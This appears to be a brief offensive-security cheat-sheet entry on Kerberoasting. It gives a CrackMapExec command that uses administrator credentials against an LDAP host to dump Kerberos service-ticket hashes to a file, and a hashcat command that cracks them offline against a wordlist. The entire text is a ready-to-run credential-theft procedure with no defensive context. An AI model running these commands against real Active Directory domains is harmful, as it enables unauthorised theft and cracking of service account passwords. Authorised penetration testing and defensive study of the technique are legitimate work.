Kerberoasting with CrackMapExec - Retrieve the Kerberos 5 TGS-REP etype 23 hash
crackmapexec ldap 192.168.1.119 -u Administrator -p 'Password!' --kerberoasting output.txt
hashcat -m 13100 output.txt wordlist.txt
Last updated 1 year ago